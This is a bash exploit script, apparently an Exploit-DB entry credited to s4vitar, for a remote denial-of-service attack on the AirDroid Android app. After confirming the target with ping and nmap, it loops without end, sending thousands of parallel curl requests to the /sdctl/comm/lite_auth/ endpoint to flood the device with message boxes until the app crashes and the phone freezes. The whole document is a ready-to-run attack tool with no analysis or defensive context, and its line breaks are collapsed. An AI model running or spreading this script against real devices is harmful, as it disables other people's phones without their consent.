#!/bin/bash # ***************************************************** # * Author: Marcelo VA!zquez (aka s4vitar) * # * AirDroid Denial of Service (DoS) & System Crash * # ***************************************************** # Exploit Title: AirDroid Remote Denial of Service (DoS) & System Crash # Date: 2019-02-07 # Exploit Author: Marcelo VA!zquez # Vendor Homepage: https://web.airdroid.com/ # Software Link: https://play.google.com/store/apps/details?id=com.sand.airdroid&hl=en # Version: AirDroid # Tested on: Android #Colours greenColour="\e[0;32m\033[1m" endColour="\033[0m\e[0m" redColour="\e[0;31m\033[1m" blueColour="\e[0;34m\033[1m" yellowColour="\e[0;33m\033[1m" purpleColour="\e[0;35m\033[1m" turquoiseColour="\e[0;36m\033[1m" grayColour="\e[0;37m\033[1m" trap ctrl_c INT function ctrl_c() { echo -e "\n\n${yellowColour}[${endColour}${redColour}*${endColour}${yellowColour}]${endColour}${grayColour}Exiting...${endColour}\n" && tput cnorm pkill curl > /dev/null 2>&1 exit } function check_host(){ # Target availability detection echo -e "${yellowColour}[${endColour}${redColour}*${endColour}${yellowColour}]${endColour}${grayColour} Checking host availability...${endColour}" && sleep 1 ping -c 1 $host > /dev/null 2>&1 if [ "$(echo $?)" == "0" ]; then echo -e "\n\t${greenColour}--${endColour}${redColour} Host is active${endColour}${greenColour} --${endColour}\n" else echo -e "\n\t${greenColour}--${endColour}${redColour} Host is inactive${endColour}${greenColour} --${endColour}\n" && tput cnorm && exit fi echo -e "${yellowColour}[${endColour}${redColour}*${endColour}${yellowColour}]${endColour}${grayColour} Checking if port is open...${endColour}" && sleep 1 if [ "$(nmap -p$port --open -T5 -v -n $host | grep open)" ] && [ "$(nmap -p$port $host -sC -sV | grep -i airdroid)" ]; then echo -e "\n\t${greenColour}--${endColour}${redColour} Port${endColour}${grayColour} $port${endColour}${redColour} is open!!${endColour}${greenColour} --${endColour}\n" echo -e "\t${greenColour}--${endColour}${redColour} ${endColour}${turquoiseColour}Airdroid Service${endColour}${redColour} detected !!${endColour}${greenColour} --${endColour}\n" elif [ "$(nmap -p$port --open -T5 -v -n $host | grep open)" ]; then echo -e "\n\t${greenColour}--${endColour}${redColour} Port is open but it does not correspond to the ${endColour}${turquoiseColour}Airdroid service${endColour}${redColour}!!${endColour}${greenColour} --${endColour}\n" && tput cnorm && exit else echo -e "\n\t${greenColour}--${endColour}${redColour} Port is closed!!${endColour}${greenColour} --${endColour}\n" && tput cnorm && exit fi } function banner() { sleep 0.2 && echo -e "\n$redColour /\ $endColour" sleep 0.2 && echo -e "$redColour / \ $endColour" sleep 0.2 && echo -e "$redColour | | $endColour $yellowColour[${endColour}${grayColour}AirDroid Denial of Service (DoS) [System Crash]${endColour}${yellowColour}]${endColour}" sleep 0.2 && echo -e "$redColour | | $endColour ${yellowColour}Author:${endColour}${grayColour} Marcelo VA!zquez (aka s4vitar)${endColour}" sleep 0.2 && echo -e "$redColour / == \ $endColour" sleep 0.2 && echo -e "$redColour |/**\| $endColour" sleep 0.2 && for i in $(seq 1 70); do echo -ne "${redColour}-${endColour}"; done && sleep 1 && echo } if [ "$(echo $#)" == "2" ]; then tput civis && banner host=$1 && port=$2 echo && check_host # Path to launch the message box on the mobile device url="http://$host:$port/sdctl/comm/lite_auth/" tput cnorm && echo -ne "${yellowColour}You want to start the attack?${endColour}${grayColour} <${endColour}${redColour}y${endColour}${turquoiseColour}/${endColour}${blueColour}n${endColour}${grayColour}>${endColour}${grayColour}:${endColour} " && read attack_response if [ "$(echo $attack_response)" == "y" ]; then counter=0 # Start launch attack of the message boxes, so the Application crash and the device freezes tput civis && while true; do for i in $(seq 1 3000); do curl --silent "$url" & let counter+=1 done && wait echo -e "\n${yellowColour}[${endColour}${redColour}*${endColour}${yellowColour}]${endColour}${redColour} $counter${endColour}${grayColour} requests successfully sent${endColour}${redColour}!!${endColour}" done else : fi else echo -e "\n${blueColour}Usage: ${endColour}${redColour}./airdroid_dos.sh ${endColour}${yellowColour}<${endColour}${grayColour}ip_address${endColour}${yellowColour}>${endColour}${yellowColour} <${endColour}${grayColour}port${endColour}${yellowColour}>${endColour}\n" fi